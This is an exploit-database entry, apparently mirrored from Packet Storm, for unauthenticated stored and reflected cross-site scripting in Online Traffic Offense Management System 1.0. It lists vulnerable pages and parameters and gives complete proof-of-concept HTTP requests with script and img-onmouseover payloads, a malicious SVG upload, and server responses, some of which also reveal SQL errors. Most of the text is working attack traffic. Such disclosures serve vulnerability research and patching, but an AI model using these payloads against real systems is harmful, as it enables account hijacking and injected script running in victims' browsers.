Exploit for Online Traffic Offense Management System 1.0 Cross Site Scripting

Name: Exploit for Online Traffic Offense Management System 1.0 Cross Site Scripting
Rating: 5 (183 reviews)
2021-10-07 | CVSS -0.5
## https://sploitus.com/exploit?id=PACKETSTORM:164433
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)  
# Date: 07/10/2021  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: snup.php@gmail.com  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html  
# Version: 1.0  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
### XSS Stored and XSS Reflected  
  
# All requests can be sent by both an authenticated and a non-authenticated user  
  
# XSS Stored - example vulnerable pages and parameters:  
  
* The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters  
* We can upload SVG file from XSS to all places in webapp  
* We can add evil code from admin account, regular user account and unauthenticated - we needs only request  
  
* http://localhost/traffic_offense/admin/?page=user  
Parameters:  
- firstname  
- lastname  
- user image - svg file with javascript code - XSS  
  
* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record  
Parameters:  
- date_created  
- ticket_no  
- officer_id  
- officer_name  
- status  
- remarks  
- SVG file with javascript code - XSS   
  
* All application is vulnerable  
  
# XSS Reflected - example vulnerable pages and parameters:  
  
* http://localhost/traffic_offense/admin/?page  
Parameters:  
- page  
  
* http://localhost/traffic_offense/classes/Login.php  
Parameters:  
- username  
- password  
  
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]  
Parameters:  
- id  
  
* http://localhost/traffic_offense/classes/Master.php  
Parameters:  
- id  
  
* http://localhost/traffic_offense/classes/Users.php  
Parameters:  
- id  
  
-----------------------------------------------------------------------------------------------------------------------  
# POC  
-----------------------------------------------------------------------------------------------------------------------  
  
## Example 1 - XSS Reflected  
  
# Request using POST method, payload is in the parameter value id  
  
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583  
Content-Length: 1061  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/traffic_offense/admin/?page=user  
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------21986352462593413643786432583  
Content-Disposition: form-data; name="id"  
  
13<script>alert(1)</script>37  
-----------------------------21986352462593413643786432583  
Content-Disposition: form-data; name="firstname"  
  
hacked  
[...]  
  
-----------------------------------------------------------------------------------------------------------------------  
# Response  
  
HTTP/1.1 200 OK  
Date: Thu, 07 Oct 2021 01:05:26 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
X-Powered-By: PHP/7.4.23  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 186  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37  
  
-----------------------------------------------------------------------------------------------------------------------  
# Request using GET method, payload is in the parameter value id  
  
GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Connection: close  
  
-----------------------------------------------------------------------------------------------------------------------  
# Response  
  
HTTP/1.1 200 OK  
Date: Thu, 07 Oct 2021 05:28:35 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
X-Powered-By: PHP/7.4.23  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 7893  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1  
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />  
[...]  
  
-----------------------------------------------------------------------------------------------------------------------  
  
## Example 2  
  
# XSS Stored  
  
# Save JS payload in user profile and add SVG file from vuln script  
  
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102  
Content-Length: 4304  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/traffic_offense/admin/?page=user  
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------85748650716762987124528102  
Content-Disposition: form-data; name="id"  
  
1  
-----------------------------85748650716762987124528102  
Content-Disposition: form-data; name="firstname"  
  
admin"/><img src=x onmouseover=alert(1)>  
-----------------------------85748650716762987124528102  
Content-Disposition: form-data; name="lastname"  
  
admin"/><img src=x onmouseover=alert(1)>  
-----------------------------85748650716762987124528102  
Content-Disposition: form-data; name="username"  
  
admin  
-----------------------------85748650716762987124528102  
Content-Disposition: form-data; name="password"  
  
admnin123  
-----------------------------85748650716762987124528102  
Content-Disposition: form-data; name="img"; filename="xss.svg"  
Content-Type: image/svg+xml  
  
[...]SVG PAYLOAD[...]  
  
  
-----------------------------------------------------------------------------------------------------------------------  
# Response  
  
HTTP/1.1 200 OK  
Date: Thu, 07 Oct 2021 05:31:29 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
X-Powered-By: PHP/7.4.23  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 1  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
1  
  
-----------------------------------------------------------------------------------------------------------------------  
# Request download new user data  
  
GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
  
-----------------------------------------------------------------------------------------------------------------------  
# Response  
  
HTTP/1.1 200 OK  
Date: Thu, 07 Oct 2021 05:42:04 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
X-Powered-By: PHP/7.4.23  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 24719  
[...]  
<div class="form-group col-6">  
<label for="name">First Name</label>  
<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>  
</div>  
<div class="form-group col-6">  
<label for="name">Last Name</label>  
<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>  
</div>  
[...]  
<div class="form-group col-6 d-flex justify-content-center">  
<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">  
</div>  
[...]